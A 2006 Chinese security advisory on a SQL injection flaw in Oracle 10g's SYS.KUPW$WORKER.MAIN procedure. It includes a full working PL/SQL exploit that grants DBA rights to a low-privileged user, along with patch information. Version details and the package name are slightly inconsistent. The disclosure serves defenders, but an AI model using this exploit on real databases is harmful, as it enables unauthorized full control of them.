发布日期：2006-07-18
更新日期：2006-07-19

受影响系统：

Oracle Database 10g Release 1

描述：

---

Oracle是一款大型的商业数据库系统。

Oracle 10g的SYS.KUPW$WORKERE软件包MAIN过程中存在SQL注入漏洞，成功利用这个漏洞的攻击者可以完全控制数据库系统。

MAIN过程默认是给予PUBLIC的，如果要利用这个漏洞，攻击者必须能够创建PL/SQL函数。

<*来源：Alexander Kornbrust （ak@red-database-security.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=115326096108009&w=2
        http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html?_template=/o
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;

CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/

DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
MASTER_NAME := ''' or ' || user || '.f1=1--';
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/

select *
from user_role_privs
;

建议：

---

厂商补丁：

Oracle
------
Oracle已经为此发布了一个安全公告（cpujul2006）以及相应补丁:
cpujul2006：Oracle Critical Patch Update - July 2006
链接：http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html?_template=/o

浏览次数：5244
严重程度：0（网友投票）